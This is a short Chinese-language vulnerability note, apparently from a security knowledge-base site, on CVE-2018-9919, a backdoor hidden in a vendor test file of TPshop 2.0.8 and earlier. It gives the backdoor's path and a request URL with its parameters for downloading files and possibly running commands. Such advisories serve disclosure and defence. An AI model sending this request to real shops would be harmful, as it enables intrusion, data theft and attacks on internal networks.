menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2018-9919)Thinkphp Shop后门 chevron_right (CVE-2018-9919)Thinkphp Shop后门.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2018-9919)Thinkphp Shop后门.md
    809 B / 2021-07-15 20:07:28
        (CVE-2018-9919)Thinkphp Shop后门
    ==================================
    
    一、漏洞简介
    ------------
    
    该漏洞源于/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php可以将文件下载到其他服务器上。远程攻击者可利用该漏洞获取敏感信息,并可能执行命令。
    
    二、漏洞影响
    ------------
    
    Backdoor in Tpshop \<= 2.0.8
    
    三、复现过程
    ------------
    
    攻击者可以利用此漏洞来攻击服务器并增加其特权,例如:下载任意文件PS!扫描网络端口PS!信息检测,攻击内部网络易受攻击的服务器。
    
    http://www.0-sec.org/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php?bddlj=save\_filename&down\_url=download\_url&jmmy=decry
    
    
    links
    file_download